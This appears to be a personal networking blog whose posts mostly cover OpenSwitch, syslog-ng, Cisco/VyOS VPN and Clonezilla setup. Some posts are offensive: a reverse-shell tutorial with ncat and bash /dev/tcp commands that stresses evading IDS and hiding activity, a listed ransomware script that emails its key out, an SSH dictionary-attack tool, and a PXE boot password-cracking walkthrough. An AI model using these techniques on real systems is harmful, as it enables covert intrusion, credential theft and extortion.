My name is Radovan Brezula and you are reading my personal blog. By way of introduction, let me tell you few words about me and my blog. I work as a professional soldier of the Slovak Armed Forces. I've been a Linux enthusiast since 2005. That time I fell in love with Fedora Linux. My relationship with my beloved Fedora was broken in 2013 when I started using Linux Debian.

I started with my blog in September 2010, at that time as a side project of my studies for Cisco certification. As the days went by, I added tutorials about emulation of various network devices from different vendors using GNS3. In case that you are looking for articles about running devices such as Cisco CSR 1000v, Quagga, VyOS, Open vSwitch, Atista, Alcatel-Lucent and others on Linux, the blog is the right place to start reading. You will also find here information about installation of machine emulators and virtualizers such as Qemu, KVM, VirtualBox, VMware Workstation on Debian and Fedora Linux.

If you wish to get in touch with me, here is my Google+ profile and Google+ page. You can also reach me via Facebook  or send me an email to If you think it is reasonable to send me an encrypt message, here is my public GPG key.

OpenSwitch Network Operating System

The Open Network Install Environment (ONIE) is an open source install environment that gives a switch user a choice to download ONIE compliant Network Operation System (NOS) to bare metal network switches. The OpenSwitch is community based, open source NOS that runs on hardware based on ONIE.

The goal of this article is to show how to build OpenSwitch Virtual Machine appliance, describe its capabilities and to introduce three methods for managing OpenSwitch. The OpenSwitch VM appliance was created by OpenSwitch project for training and testing purpose. It uses software data plane to forward the packets but it is not intended to be used as a virtual switch for connecting virtual machines. OpenSwitch supports many L2, L3 protocols such as STP, LACP, LLDP, OSPF, BGP, DHCP, TFTP, NTP, SSH, SNMP and others. These protocols run as separate daemons and they were integrated from another open-source projects.

For instance Quagga project provides L3 functionality to Openswitch. Quagga modules ops-ospf and ops-bgp update active routes in OpenvSwitch database (OVSDB). The module ops-zebra reads routes from OVSDB and install them to the kernel. Static routes are also stored in OVSDB, read by ops-zebra module and installed to the kernel. In order to use ASIC for fast-path routing, the module ops-vswitchd downloads a route from OVSDB and it install is to ASIC. ASIC uses the route, nexthop IP, next hop MAC and the egress port to route a packet. The pair neigbour IP address and MAC address is read from kernel neighbor table by a module ops-arpmgrd. If there is no entry, packets is sent to a kernel for ARP resolution and routed by the kernel. However the missing neighbor MAC address is added to ASIC and all other subsequent packets are routed by ASIC. The module ops-arpmgrd is also responsible for sending requests to kernel to refresh ARP entries for neighbors that have active data traffic.

The functionality of all OpenSwitch modules is very well documented on OpenSwitch website. The modules are stored in a directory /usr/sbin inside the OpenSwitch VM appliance.

OpenSwitch uses CLI similiar to Cisco IOS CLI. It makes configuration enough straightforward for a Cisco network engineer. They are also other two methods Web UI and Rest API that we can use for OpenSwitch management. I will describe them later.

1. Building OpenSwitch OVA Image From Sources

They are two ways how to obtain OpenSwitch OVA image. We can either clone OpenSwitch repository and compile OVA image from sources or we can donwnload image directly from OpenSwitch website.

In order to build OpenSwitch, we first need to install Linux OS. Linux can be installed on a virtual machine but assign enough CPU cores and RAM to the VM. Building the OpenSwitch from sources takes lots of resources so in order to shorten the time required for compilation, make your VM really powerful. I have assigned four CPU 4 cores and 4G RAM to the guest and compilation taken about 30 minutes.

Now we can install packages required for compilation.

$ sudo apt-get install python chrpath device-tree-compiler build-essential diffstat texinfo openssl libssl-dev

Clone the OpenSwitch development environment and build system.

$ git clone
$ cd ops-build

Compile sources with the following commands.

$ make configure appliance
$ make

Once compilation finishes, the OVA image should be ready in a directory ~/ops-build/images. Now download the final OVA image from the guest to the host machine with the command:

$ scp -rv ~/ops-build/images/openswitch-appliance-image-appliance.ova brezular@

2. Downloading OVA Image

The OVA image can be found on OpenSwitch website but without the guarantee that the image is uploaded  there. Check the content one of the directories here. There should be a directory named appliance containing the OVA image. If not, try to search inside an another directory.

3. Runing OpenSwitch Virtual Appliance

Use Virtual Box to import a virtual machine. Navigate to File-> Import Appliance. If you prefer Qemu to Virtualbox just extract vmdk disk from OVA image with the command:

$ tar xvf openswitch-appliance-image-appliance.ova

Then you can start the virtual machine with the command below.

$ /usr/local/bin/qemu-system-x86_64 --enable-kvm -m 1024M -smp 2 OpenSwitch.vmdk

4. Users and Groups

By default they are three built-in roles ops-admin, ops-netop and none created for authenticated users. The roles ops-admin and ops-netop are represented by user groups with the same names. Users are assigned to the group based on their roles. For instance, members of the group ops-admin have no access to OpenSwitch shell - vtysh so they cannot configure OpenSwitch. However all the members of the group ops-admin can run sudo su command and eventually start vtysh shell. It is because there is a following line in the file /etc/sudoers.d/useradd.

%ops_admin ALL=(ALL) NOPASSWD: ALL

The group ops-admin is used for firmware upgrades, changing users' accounts (after sudo su command). User accounts assigned to the group ops-netop have access to vtysh shell and they are used for reading and writing from and to OpenSwitch configuration.

Below is the list of some default users created on OpenSwitch appliance assigned to the particular groups and having access to shells.

root - without password, /bin/bash
admin - without password assigned to ops-admin group, /bin/bash
netop - password netop assigned to ops-netop group, /usr/bin/vtysh

The user netop is a member of the groups ops-netop, ovsdb-client and ops-coredump. This user has access to vtysh shell and it is used for configuring OpenSwitch. If we want to create a new user account e.g. test for OpenSwitch configuration, we need to create it as following:

# /usr/sbin/useradd -g ops_netop -G ovsdb-client -s /usr/bin/vtysh test

The user test is now assigned to its primary group ops_netop and to the group ovsdb-client using the vtysh shell.

Note: The user root has no password set so it should be configured to allow an access to the system for authorized users only.

5. Web User Interface

The Web UI  provides  provides system, general and hardware information about OpenSwitch. It also provides status and utilization of the interfaces and displays their statistics. You can find there information about VLANs, logs and configuration of the Link Aggregation (LAG) and Equal-cost multi-path routing (ECMP). It also contains links to OpenSwitch Rest API and to quick guides about interfaces and LAG configuration.

Picture 1 - Web UI

The Web UI is using the REST API to authenticate the user and to retrieve a list of permissions accessible to the user. Use switch CLI to login as root with no password. Enable and start nginx and restd services.

systemctl enable nginx && systemctl start nginx
systemctl enable restd && systemctl start restd

If there is a DHCP server running in a network where OpenSwitch appliance is connected to, the switch should obtain the IP address from DHCP server on its eth0 interface. If not, you probably need to bridge the first switch interface to the network with DHCP server. Navigate to Machine-> Settings-> Network-> Adapter1 and bridge the interface. Then use web browser to login to the IP address of the eth0 interface as a user netop with the password netop.

6. Rest API

Using Rest API and HTTP methods such as GET, PUT, PATCH, POST we can get or store data from and to the OpenSwitch. First we will show how to log to the OpenSwitch using curl command.

Login to OpenSwitch with the IP address  assigned to a management interface with the username netop and password netop and save a cookie to the file mycookie. If there is no an error message, yur login is successful.

$ curl -c mycookie -X POST -k ""

Check if the cookie is successfully stored with the command below.

$ more mycokie

Picture 2 - Saved Cookie

Now we can pull  information from OpenSwitch. For instance, list the available interfaces with the command:

$ curl -b mycookie -k

Picture 3 - Available Interfaces

Similarly, we can pull information about configured VLANs. There is only default VLAN 1 created.

$ curl -b mycookie -k

Picture 4 - List of VLANs


Syslog-ng Configuration For Newbies

Some time ago I was asked by my friend to recommend a cost-free solution that he could use for storing logs of his security device over network. The Linux OS with installed syslog-ng is perfectly suitable for this job because it can collect logs from any source, process them in near real-time and deliver them to a wide variety of destinations. However it was challenge to explain all the steps in an easy manner as he was a total newbie in a Linux world. For this reason I wrote a basic installation and configuration manual for him which I share with you. The manual helps you to setup syslog-ng on Ubuntu server and troubleshoot the possible issues.

1. Install Ubuntu 16.04 Server Edition

During Ubuntu installation you are asked to provide the username/password and IP settings. Once an installation process finishes, the system is rebooted. when you get your console again, login and install updates with the command:

$ sudo su
# apt-get update
# apt-get upgrade

2. Install and Configure Syslog-ng

# apt-get install syslog-ng

First, you need to download a simple configuration file that I created for you.

# cd /etc/syslog-ng/conf.d
# wget -O firewals.conf
# service syslog-ng restart

3. Static IP Address Configuration

You probably need to configure a static IP address for the interface. Find the name of our Ethernet interface with the ifconfig command. Then edit the file /etc/network/interfaces with nano or vim editor and configure IP settings. Below is an example of static IP configuration for the interface ens3.

Picture 1 - Static IP Address Configuration

Restart a network service with a command:

# service networking restart

4. Troubleshooting

The Syslog-ng service should listen on all IP address and TCP and UDP port 514.

# netstat -tulpn | grep 514

Picture 2 - TCP/UDP Port 514 Opened by Syslog-ng Service

If you want the syslog-ng to listen on a particular IP address instead of all IP addresses, replace the IP address with the desired IP address in the configuration file /etc/syslog-ng/conf.d/firewals.conf. You can also change the owner of the saved log files there. Do not forget to restart syslog-ng service after your changes in the config file.

Logs are placed to the directory /var/log/firewalls. Check a content of the directory with the command:

# ls -l /var/log/firewalls/
total 8
drwxr-x--- 3 ubuntu ubuntu 4096 Dec 8 20:16
drwxr-x--- 3 ubuntu ubuntu 4096 Dec 8 20:18

As you can see they are two directories and that were automatically created by syslog-ng based on the IP addresses of the devices we are collecting logs from. 

Picture 3 - Testing Topology

Our configuration file tells syslog-ng to create a directory structure based on the IP_of_device/year/month for each contributing device. For each day a log file is created inside the IP/year/month directory.  Let's inspect a log file of a router

# cat /var/log/firewalls/
Dec 8 20:16:45 : %SYS-5-CONFIG_I: Configured from console by console
Dec 8 21:14:21 : %SYS-5-CONFIG_I: Configured from console by console
Dec 8 21:15:33 : %LINK-5-CHANGED: Interface GigabitEthernet1/0, changed state to administratively down
Dec 8 21:15:34 : %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0, changed state to down
Dec 8 21:17:28 : %SYS-5-CONFIG_I: Configured from console by console
Dec 8 21:22:32 : %LINK-3-UPDOWN: Interface GigabitEthernet1/0, changed state to up
Dec 8 21:22:34 : %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0, changed state to up

5. Configuring Cisco Router for Sending Traps to Syslog-ng

These two commands configure a Cisco router for sending logs with a priority 5 (notification) to a syslog server with IP address

R1(config)# logging trap notifications
R1(config)# logging host


Reverese Shell on Linux

Reverse shell is technique when a client connects to a server and the client provides its shell to the server. Clients is typically a host hidden behind the NAT or a firewall having an access to the server but not vice versa. Thanks to a reverse shell the server controls a client's shell having an access to the client's network even the client is hidden behind the NAT. They are several methods how to create a reverse shell used depending on software available on the client. I will show how to create a reverse shell using SSH, Ncat and Bash.


Picture 1 - Network Topology

Picture 1 shows our testing topology. The client (Ubuntu Server 16.04) is located behind the NAT with the IP address The server (Kubuntu 16.04) has assigned the IP address

1. Reverse Shell Using SSH Reverse Tunnel

This method is based on the fact that the client has knowledge of the server SSH login credentials and vice versa. SSH server must be running on both the server and client. Client must be allowed to access server through firewall.

$ ssh -R 10000: brezular@

10000 - remote port opend on the server
22 - clients's local port
brezular@ - username and IP address of the server

First, check if port 10000 is open on server.


Picture 2 - TCP Port 10000 Opened on Server

Now we connect from the server to the client with the command:

$ ssh -p 10000 root@

2. Reverse shell with Ncat using SSL encryption

In order to prevent IDS to inspect a content of network traffic we will use a version of Ncat that supports SSL. The netcat version provided by a Nmap package supports both SSL and IPv6.

$ ncat --version
Ncat: Version 7.01 ( )

First, we will configure server to listen on all IP addresses and TCP port 10000.

$ ncat -l -k -v --ssl -p 10000

By default a TCP protocol is used. Only TCP Ncat mode supports SSL.
-l listen
-k accept multiple connections in listen mode
-v verbose mode
--ssl connect with SSL
-p port

$ ncat -e /bin/bash --ssl 10000

-e executes /bin/bash

Ncat is working great but in many cases it is not installed on the client. To provide a correct version of Ncat I have created a script that contains converted Ncat binary from the Nmap package to base64 and hexa strings that are stored in particular variables. The script extracts ncat to a file /tmp/.binary. Then it checks if there is an established session with the server If no, it tries to connects to the server,  TCP port 10000. If connection is successful, session between client and server is established and script waits. If no connection is established, the script keeps to connect the server every 20 seconds.

3. Reverse Shell with Bash

Scripting languages can be used to create a reverse shell. I will show a reverse shell using Bash that is very common in Linux. Again, we start the Ncat on the server to listen on a port 10000.

$ ncat -l -k -v --ssl -p 10000

$ while true; do (/bin/bash -i > /dev/tcp/ 0>&1 2>&1) > /dev/null 2>&1; [ "$?" == 1 ] && sleep 20; done

To hide our activity in the system we will slightly change a script written by Danielle Bellavista which obfuscates our Bash reverse shell command. The script creates a file payload in a actual directory. Then we just copy a file payload to the client, assign execute privileges to the file and run it on the client.



Bash Script for Converting Video To MP3 Audio

I like listening to video training on my smartphone while walking to work. To save the space on the memory card I convert videos to MP3 audio in advance. For this purpose I wrote a Bash script which helps me to manage a conversion job. The script uses ffmpeg for conversion and it creates parallel conversion tasks to speed up the conversion process. The script checks the CPU load and it creates a new background process only if the CPU load is under a particular limit entered by a user.


Picture 1 - Script Usage

Below is the output from the conversion process.


Picture 2 - Output From Conversion Process

The script creates a log file displaying info about the result of all conversion tasks. If the conversion fails for a particular video file, the script displays a return value of ffmpeg utility and the name of the file which is not successfully converted.


Picture 2 - Output from Log File



GRE over IPSec Tunnel and NAT Between Cisco and VyOS

The goal of this tutorial is to provide a configuration for Cisco and VyOS network devices with configured PAT (Port Address Translation) that connect two remote sides A and B through point-to-point GRE tunnel encapsulated into a IPsec tunnel. In a previous tutorial we proved that GRE tunnels in conjunction with IPsec tunnels transmit multicast traffic while data integrity, authentication and confidentiality was in place. I also provided a simple configuration of GRE, IPsec tunnel and OSPF routing protocol on the Cisco and VyOS routers. In this tutorial I will go further and provide full configuration of  the all network devices including PAT and access-lists.  picture1_network_infrastructure

Picture 1 - Network Topology

Topology Description - Side A

Each side has a Layer 2 Cisco switch located in a LAN network. A switch connects hosts to its switchports. Each switchport is assigned to a particular VLAN. For instance, a host PC1 is connected to the switch SW1 and the switchport is assigned to a VLAN 100. Hosts in VLAN 100 (subnet have guaranteed access to a remote subnet via GRE/IPsec tunnel. A NAT access-list configured on a router R1 ensures that IP address of the host in VLAN 100 is not translated by PAT when a destination address is inside a range However, if a destination address is not in a range, the PAT translates IP addresses of the hosts in VLAN 100 to a public IP address For instance it happens when a user logged on the host  PC1 tries to connect to the router R3 located in the Internet.

Hosts assigned to VLAN 100 have blocked access to a VLAN 300 ( because the VLAN 300 is reserved for guests. For this reason hosts assigned to the VLAN 300 have their access limited only to the Internet. The hosts assigned to the VLAN 100 have no access to the subnet configured on a remote VyOS router. The reason is that the subnet is hidden behind NAT  thus it is not reachable from the Internet.

Topology Description - Side B

The side A shares the similar connectivity principles with a side B. Hosts assigned to the VLAN 200 ( can reach the hosts in a remote subnet via GRE/IPsec tunnel. They can also reach the public addresses in the Internet. However in this case, their IP addresses from the subnet are translated to a public IP address by PAT. The VLAN 400 is where guests are connected. The hosts assigned to this VLAN have access only to the Internet and their IP addresses are translated to an IP address A detailed connectivity table for sides A and B is shown below.


Tab 1 - Connectivity Between Subnets

1. Internet Configuration

1.1 Router R3 Configuration

The following commands configured on a router R3 make the router to act as our simulated Internet which connects two remote sides A and B.

2. Side A Configuration

2.1 Layer2 Switch SW1 Configuration

Configure an interface Gi0/0 as a trunk port with allowed VLANs 100 and 300. Configure appropriate VLANs on access interfaces Gi0/1 and Gi0/2 and set interfaces as access ports. The actual commands are here.

2.2 Hosts PC1 and PC3 Configuration

All hosts located in infrastructure are based on Core Linux which requires additional configuration in order to keep IP settings after restart. To make configuration easier for you I have created a BASH script that configures an IP address, subnet mask and default gateway for a particular host. Just copy and paste the script to the vim editor on each PC and run the script as a user root with the command:

$ sudo bash ./ pcnumber

Replace a word pcnumber with a number:

$ sudo bash ./ 1

$ sudo bash ./ 3

2.3 Router R1 Configuration

2.3.1 Router R1 on the Stick and Default Route

This configuration provides routing between VLANs 100 and 300 and it creates a static default route to the Internet.

2.3.2 R1 - NAT

Here we configure sub-interfaces GigabitEthernet 1/.0.100 and 1/0.300 as the NAT inside interfaces and the interface GigabitEthernet 0/0 as the NAT outside interface. The PAT configuration consists of creating a named access-list PAT that permits a translation of a subnet to any subnet and it denies a translation of the subnet to the subnet The subnet will be translated to the public address only if traffic is not destined for a remote IPsec subnet The PAT access-list is applied on the interface GigabitEthernet 0/0.

2.3.3 R1 - ISAKMP - Phase 1

First we create isakmp policy and select encryption, the hash algorithm, type of authentication, Diffie-Hellman group and lifetime. Then we configure key the shared key and peer address.

2.3.4 R1 - IPSec - Phase 2

In phase two we are going to create  IPSec ipsec transform set MyTS and configure encryption and the hash algorithm. This is also a place where we define IPSec mode - either a tunnel (default) or transport mode. In the tunnel mode a completely new IP delivery header is inserted in each IPSec packet while in a transport mode IP header stays untouched (except of the changed protocol type - 50 for ESP). Continue with creating a new IPsec profile named Protect-GRE. Assign transform-set MyTS is to the profile Protect-GRE and configure the lifetime. And finally assign IPSec profile to the interface tun0.

2.3.5 R1 - GRE Tunnel

GRE tunnel configuration is here.

2.3.6 R1 - OSPF Routing Protocol

OSPF routing protocol is configured here. In order to prevent sending OSPF hello multicast messages to a LAN network we configure interfaces GigabitEthernet 1/0.100 and  1/0.300 as passive interfaces.

2.3.7 R1 - Access Lists

First we create an extended named access-list incoming_traffic_g0/0. The rule 10 permits UDP packets from source IP to a destination IP address, the destination UDP port 500. This is a port that ISAKMP protocol uses. The rule 20 permits ESP packets from the IP address to the IP address The rules 10 and 20 are required by IPSec tunnel. The rule 30 permits icmp echo-reply traffic from any subnet to the IP address We need this rule to allow our hosts behind NAT to ping hosts in the Internet. The rule 40 permits established TCP traffic from any host to the IP address  This rule is needed in order to pass incoming established TCP traffic previously sent by our hosts behind NAT to the Internet. The rule 1000 blocks any other traffic. Finally, we will apply the access-list on the interface GigabitEthernet 0/0 in an incoming direction.

The extended access-list outgoing_traffic_tun0 permits outgoing traffic from the subnet to the subnet and it blocks any other traffic. The access-list is applied on the interface tun0. It ensures that only traffic from the subnet destined for the subnet is encapsulated into the GRE tunnel.

To prevent sending packets with private addresses to the Internet when the IPsec tunnel fails, we need to create the access-list outgoing_traffic_gi0/0. The rule 10 ensures that any packets with source address from the subnet leave the router R1. The access-list is configured in an outgoing direction on the interface GigabitEthernet0/0. The rule 1000 permits any other traffic.

The extended named access-list incoming_traffic_gi1/0.300 applied on the interface GigabitEthernet 1/0.300 for incoming packets prevents hosts on the subnet to reach the hosts inside the subnet

The extended named access-list incoming_traffic_gi1/0.100 applied on the interface GigabitEthernet 1/0.100 for incoming packets prevents hosts on the subnet to to reach the hosts inside the subnet

3. Side B Configuration

3.1 Layer 2 SW2 Configuration

The following commands configure a trunk port, access ports and VLANs on L2 switch SW2.

3.2 Hosts PC2 and PC4 Configuration

$ sudo bash ./ 2

$ sudo bash ./ 4

3.3 Router VyOS Configuration

3.3.1 Router VyOS on Stick and Default Static Route

First, we configure an IP address on the interface eth0 and the particular IP addresses on the sub-interfaces eth1.200 and eth1.400. Then we create a default static route with the IP address as a next hop.  The actual configuration is here.

3.3.2 VyOS - NAT

We will create a source NAT with the rule 5 that excludes translation of the packets sent from the IP subnet to the subnet The rule 10 translates the source IP addresses of packets from the subnet to a public IP address The IP address is configured on the outbound interface eth0. The rule 15 translates IP addresses of hosts from the subnet to the IP address when they sent traffic to the Internet. NAT configuration is here.

3.3.3 VyOS IPSec Tunnel

Enable IPSec on interface eth0.

3.3.4 R1 IKE Group - Phase 1

Create the ike-group named cisco and  configure encryption, the hash algorithm, DH group and lifetime.

3.3.5 VyOS - ESP Group - Phase 2

Create the esp-group named cisco and configure encryption, the hash algorithm and lifetime. Configure tunnel peer and pre-shared key. Associate ike group cisco and esp group cisco with the peer Configure a local address used for connection. And finally, configure GRE protocol that is going to be encapsulated inside IPSec tunnel.

3.3.6 VyOS - GRE Tunnel

Create a new route policy change_mss that changes TCP MSS (Maximum Segment Size) to 1360 bytes. Then we can create GRE tunnel.

3.3.7 OSPF Configuration

Here is OSPF routing protocol configuration on VyOS.

3.3.7 VyOS - Firewall Configuration

The firewall incoming_traffic consists of the rules 1, 5 and 10 with a configured default action drop. The rule 1 allows incoming established and related traffic generated by the hosts assigned to VLAN 200 and 400. The rule 5 accepts incoming packets from the IP address to the IP address and to the destination port UDP 500. This is the port a ISAKMP protocol uses. The rule 10 accepts incoming packets with esp protocol from the IP address to the IP address The firewall name incoming_traffic is applied on the interface eth0 for incoming traffic passing the firewall and traffic destined for firewall itself (keyword local).

The firewall outgoing_traffic_tun0 inspects outgoing traffic from the interface tun0. The rule 10 allows outgoing traffic  from the subnet to the subnet All other traffic is dropped.

The firewall outgoing_traffic_eth0 with the rule 10 applied on the interface eth0 in the outgoing direction prevents packets with source addresses destined for the subnet to leak to the Internet when the VPN tunnel fails.

The firewall incoming_traffic_eth1_400 with the rule 10 applied on the sub-interface eth1.400 in the incoming direction blocks traffic with source IP address from the subnet to the subnet Similarly, the firewall incoming_traffic_eth1_200 with the rule 10 applied on the sub-interface eth1.200 in the incoming direction blocks traffic with source IP address from the subnet to the subnet






This article contains a list of scripts that I created and that are somehow useful for me. You are free to download and modify them according to your needs. I do not take any responsibility for improper use or any damage caused by using them.

1. Networking & Servers

1.1 Automatic Deployment VyOS ISO on VMware VM
A Bash script deploy downloads the latest VyOS ISO image and an Expect script install vyos.exp installs VyOS ISO on VMware vmdk disk.

1.2 Automatic Deployment of DRBL (Clonezilla) Server
The script installs and configure DRBL server on Ubuntu with a single Ethernet card. You have to provide the name of Ethernet interface as an argument. The script creates a virtual interface for you based on a physical interface. It also downloads a DRBL project public key, download and install drbl package from repository.

1.3 Secure Copy with Rsync from SSH server
The script keeps copying files with rsync command while a return value of the rsync command is not zero. Just edit script and set server IP address and bothe remote and local directory.

1.4 Collecting MAC and IP addresses of Hosts Connected to Cisco Switches
The script collects info about ports, MAC address and IP address of hosts connected to Cisco switches. It uses SNMP protocol to do this task so switches must contain a valid SNMP configuration.

1.5 Cloning Remote Linux Machines
The script backup automates a process of cloning disks of remote Linux machines. The script reads IP addresses from a file and uses credentials you provide as command-line arguments for SSH connection.

1.6 Public Key Authentication on Cisco IOS
The Bash script and the Expect script addkey.tcl deploy your pub key on remote Cisco routers. The Bash script loops over IP addresses of your routers stored in a text file and send IP address as an argument to the Expect script together with login credentials. The Expect script establishes connection to a router using SSH and it adds a hash of your pub key into to a configuration file of toyr router. It also creates a new privilege user with privilege level 15.

2. Multimedia

2.1 Extracting MP3 from YouYube Videos with Youtube-dl
I am extremely bad in remembering correct syntax of commands so I wrote a Bash script convert based on the script youtube-dl which converts my favorite youtube videos to mp3 format. The script takes a YouTube link as an argument.

2.2 Convert CD Audio to MP3
The Bash script cda to converts CD audio to MP3.

2.3 Convert Video to MP3
The Bash script video to converts video to MP3.

3. Security & Hacking

3.1 Hacking Clonezilla SE PXE Boot Client Password
The script get plain mounts a remote NFS directory on DRBL server and extracts a plain text password. The script takes an IP address of DRBL/Clonezilla server as an argument.

3.2 Simple Ransomware
The script uses openssl to encrypt doc docx txt xls and some other files with aes256 encryption algorithms and send an encryption key to a particular email address.

3.3 Dictionary Attack Against SSH Server
The script performs a dictionary attack against SSH server. It reads usernames and passwords from dictionaries (one file for a username and one file for a password) and uses them to login to SSH server. The script also supports interrupted guessing.

3.4 Change MAC Address Randomly
The script changes MAC address for chosen interface in a given time interval.


Hacking DRBL Client PXE Boot Password

In a previous tutorial I showed installation of Clonezilla Server Edition on Ubuntu using my own Bash script. We configured PXE (Pre eXecution Environment)) password for clients so when the clients booted a password had to be entered to startup. This tutorial explains two different ways how to get and crack the PXE boot password.


Picture 1 - Client Requires to Enter PXE Password During Startup

First, we should mention some facts. The PXE client password is stored in plain text in a configuration file /etc/drbl/drblpush.conf. The password is secretpassword and it can be found in a dictionary rockyout.txt.


Picture 2 - Plain Text PXE Client Boot Password

The same PXE client password is stored as a hash in a file /tftpboot/nbi_img/prelinux.cfg/default.


Picture 3 - PXE Client Boot SHA-1 Base64 Encoded Salted Hash

The hash is created by utility /usr/sbin/sha1pass on DRBL server. It is a Perl script which takes two arguments from STDIN - a password and salt and it creates SHA-1 base64 salted hash.


Picture 4 - Perl Script fo Generating Hash from Password and Salt


  • $4$ - SHA-1 base64 encoded salted hash
  • 2mNryVVj - salt
  • WIWlkNc6cA9+eQqcf9xU0d5IvVQ - hash

They are several methods how to obtain PXE boot password. The first method is based on downloading a file /tftpboot/nbi_img/prelinux.cfg/default which contains a hash from TFTP server and cracking the hash with a tool such as john or hashcat. This method is not very practical so use it only if you want to practice your hacking skills. Moreover if a dictionary does not contain a password, your attempt very likely end up without success. The second method is fast and reliable and relies on mounting remote shared NFS directory which contains a file with a plain-text password PXE boot password.

1. Cracking Hash

Let's say we have Linux with installed DRBL server with TFTP and DHCP server running on IP address A client obtains its IP address from DHCP server together together with info about a boot file pxelinux.0. The client downloads the file pxelinux.0 from a TFTP server from a root directory/tftpboot/nbi_img/. Client also downloads files ldlinux.c32pxelinux.cfg/default from TFTP server. As we have mentioned before, the file /tftpboot/nbi_img/prelinux.cfg/default contains the hashed password. The hash is shown on the picture 5. Captured pcap traffic between DRBL server and client can be downloaded here.


Picture 5 - Captured SHA-1 Base64 Encoded Salted Password Hash

I have created a BASH script that downloads a file/tftpboot/nbi_img/prelinux.cfg/default from TFTP server and extracts SHA-1 base64 salted hash from the file together with the salt. It also converts the hash from SHA-1 base64 encoded format to SHA-1 hexa encoded format and put it to format recognized by hashcat  - sha1($salt.$pass):



Picture 6 - Script for Converting Between Salted SHA-1 Base64 and SHA-1 Hexa Hashes

1.1 Hashcat Instllation and Cracking

$ wget
$ mkdir hashcat &&  mv hashcat-2.00.7z hashcat && cd hashcat/
$ 7z e hashcat-2.00.7z

Download dictionary:
$ wget

Let's say we have our hash stored in a file hash_decoded.txt.

./hashcat-cli64.bin -m 120 hash_decoded.txt rockyou.txt


Picture 7 - Cracking SHA-1 Salted Hash with Hascat

 2. Getting Plain Text Password

In fact, we do not need to download and crack a salted SHA-1 base64 encoded password hash. We can mount a shared remote NFS directory on DRBL server to a local directory and extract a plain text password stored in a file drblpush.conf.


Picture 8 - Plain Text PXE Boot Password Stored in  Drblpush.conf for Client

I have written a Bash script which mounts a remote NFS directory and extract a plain text password. The script takes  an IP address of DRBL/Clonezilla server as an argument.


Picture 9 - Getting Plain Text PXE Boot Password Using NFS Share



Clonezilla Server Edition Installation on Ubuntu


The tutorial describes installation steps for Clonezilla Server Edition (SE) on Ubuntu 16.04.1 LTS using a Bash script. Clonezilla is OpenSource Cloning System (OCS) and it is a partition and disk imaging/cloning program . It helps you to do system deployment, bare metal backup and recovery. Two types of Clonezilla are available, Clonezilla live and Clonezilla SE (server edition).

Clonezilla live is suitable for single machine backup and restore. Clonezilla SE is for massive deployment because it can clone many computers simultaneously. Clonezilla saves and restores only used blocks in the hard disk. It decreases time and saves the hard disk space and increases the clone efficiency.

Clonezilla is a part of DRBL (Diskless Remote Boot in Linux) which provides a diskless environment for client machines. Therefore we need to install and configure DRBL server first. I created DRBL deployment script that helps you to install DRBL and configure server on Ubuntu with a single Ethernet card. You have to provide only the name of Ethernet interface and the script creates virtual interface for you based on your physical interface. It also downloads a DRBL project public key, download and install drbl package from repository. The script starts interactive Bash and Perl scripts that come with drbl package.  It starts them in this order:

  • drblsrv  - prepares files for PXE client and generates PXE menu
  • drblpush - configures DNS, clients' hostname, Ethernet card, collects MAC addresses of clients, configures and starts DHCP server, diskless services and Clonezilla mode, PXE password, grephical/text boot menu, NAT services for clients and firewall rules
  • dcs - DRBL utility to switch the mode for clients

Here is a version of packages installed with DRBL.

Deploying DRBL Server

1. Starting Script
The script must be started with root privileges. Once you login to root account with sudo su command, assign execute privileges to the script.

$ sudo su
# chmod +x ./
# ./

Now enter the name of Ethernet interface which is connected to the Internet, e.g. eth0. The script creates a new virtual interface adding suffix 100 to the name of your Ethernet interface e.g. eth0:100. It also configures IP address on your virtual interface. If you want to configure different suffix or IP address/mask on the virtual interface, just change a value of variables ipaddress, mask and suffix in the script. The script installs a package drbl from repository drbl testing.

Note: The script requires a working connection to the Internet in order to install DRBL server. The script sets only an IP address and a mask on the virtual  interface. It is your job to configure a correct IP address/mask on the physical interface. You also need to configure default route and add DNS server.  Here are my network settings /etc/network/interfaces.

2. DRBL Server Installation
The scripts automatically starts a script drblsrv with a parameter -i . The script drbl is responsible for installation of DRBL server.  Installation is interactive so you must provide answers for questions - either y or n. If the letter is capital, it is a default choice and you can press Enter or type particular letter to select this choice.

2.1 Installation of Network Images


Picture 1 - Installation of Boot Images via Network

We do not need any boot images so type N.

2.2 Serial Console Output


Picture 2 - Serial Console Output on Client Computer

We do not want to use the serial console output on the client computers so type N.

2.3 Operating System Upgrade


Picture 3 - Operating System Upgrade

We do not want to upgrade our OS  - Ubuntu 16.04.1 so type N.

2.4 Selection of Kernel Image


Picture 4 - Selecting Kernel Image for Clients

Choose option 1 - Ubuntu kernel from DRBL server.

3. Configure Clonezilla
The scripts automatically starts a script drblpush with a parameter -i (interactive mode).

3.1 DNS Domain


Picture 5 - DNS Domain

Press Enter key to configure default domain.

3.2 NISP/YP Domain


Picture 6 - NISP/YP Domain

Again, press Enter key to configure default penguinzilla domain name.

3.3 Client Hostname Prefix


Picture 7 - Client Hostname

We want our client to keep default  hostname prefix  so press Enter.

3.4 Ethernet Port


Picture 8 - Ethernet Port

In this menu we select a network interface that is connected to the Internet (not used for DRBL connection). In our case it is enp0s3 port. Press Enter to choose a default option enp0s3.

3.5 Collecting MAC Addresses of Clients


Picture 9 - Collecting MAC Addresses of Clients

We do not want to assign the same IP addresses to the clients from DHCP server thus we do not need to collect MAC addresses of the clients. Type N or just press Enter.

3.6 Same IP address for Clients


Picture 10 - Same IP address for Clients

Press Enter to reject the offer to configure the same IP addresses for clients.

3.7 DHCP Server


Picture 11 - DHCP Server

Now we configure a DHCP server running on the interface enp0s3:100 and providing IP addresses for clients. Enter an initial IP address from the range and the number of clients in your network. Then just confirm the DHCP range with Enter key or type Y.

3.8 Diskless Linux Services


Picture 12 - Diskless Linux Service

We do not need to provide diskless Linux service to clients so type option 2.

3.9 Clonezilla Modes


Picture 13 - Clonezilla Modes

Type 0 to configure full Clonezilla mode.

3.10 Directory for Storing Images


Picture 14 - Directory for Saving Saved Images

Press Enter to configure a default directory /home/partimg/ for storing saved images.

3.11 PXE Linux Password for Clients


Picture 15 - PXE Linux Password for Clients

Type y if you want to configure a password for clients. The chosen password can be changed or disabled anytime by drbl-pxelinux-passwd utility.

3.12 Graphical Background for PXE Menu


Picture 16 - Graphical Background for PXE Menu

Type y if you want to boot your clients with graphical PXE Linux menu.

3.13 NAT Services for Clients


Picture 17 - NAT Services for Clients

